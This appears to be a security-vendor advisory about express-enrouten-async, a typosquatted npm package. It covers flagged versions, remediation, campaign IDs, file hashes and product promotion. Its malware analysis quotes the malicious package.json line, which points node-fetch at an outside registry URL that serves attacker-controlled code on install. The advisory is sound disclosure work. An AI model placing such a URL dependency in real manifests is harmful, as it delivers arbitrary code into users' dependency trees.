Which versions of express-enrouten-async are malicious?

The following npm versions of express-enrouten-async are flagged malicious: 1.4.11, 1.4.12. Treat any of these as compromised.

How do I remediate express-enrouten-async if I installed it?

express-enrouten-async is a typosquat — you almost certainly intended a legitimately-named package. Remove express-enrouten-async, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

I already installed express-enrouten-async — how do I know if it already compromised me?

If express-enrouten-async was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is express-enrouten-async part of a known attack campaign?

Yes — express-enrouten-async is associated with the IN-MAL-2026-004244, IN-MAL-2026-004243, IN-MAL-2026-004240, IN-MAL-2026-004239 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find express-enrouten-async across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for express-enrouten-async (2 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging express-enrouten-async across your stack and pipelines.

Malicious package

express-enrouten-asyncnpm

Malicious code in express-enrouten-async (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4556

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall express-enrouten-async

What this malware does

Package name mimics the legitimate express-enrouten route-discovery library, but the shipped index.js only hardcodes two demo routes rather than implementing automatic route discovery. The malicious mechanism is in package.json, which declares "node-fetch": "https://registry.ctzbg.com/express-enrouten-async/node-fetch" — a direct URL dependency pointing at a third-party, non-npm registry under a path namespaced to this package. On npm install, npm fetches and installs whatever tarball that URL serves as the installer's node-fetch, so any code requiring node-fetch in the host application loads attacker-controlled, unpinned, mutable bytes from a non-publisher domain. This is dependency-confusion-style supply-chain attack: the lookalike package name lures the install, and the URL-pinned fake node-fetch is the delivery vehicle for arbitrary code into the installer's dependency tree.

Malicious versions

2 flagged

1.4.111.4.12

Indicators of compromise (SHA-256)

5d8f74bd578bedcd5395600fd615f05122d59e27e0a59318ee226d123c67092c

6ad6c1863bd00e262f6555b8e450c471e494e2f808c9f89ba09fa248689f8a24

92452005ac9e56af97c1209041f118aa294e5a5350a6df1e943cea1fdb0e0b5b

f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e

Detection & response playbook

Typosquat

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for express-enrouten-async (2 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging express-enrouten-async across your stack and pipelines.
If you installed it — respond
express-enrouten-async is a typosquat — you almost certainly intended a legitimately-named package. Remove express-enrouten-async, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.
Did it already run?
If express-enrouten-async was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks express-enrouten-async before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. express-enrouten-async on npm has been identified as a malicious package (versions 1.4.11, 1.4.12 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004244IN-MAL-2026-004243IN-MAL-2026-004240IN-MAL-2026-004239

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks express-enrouten-async-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring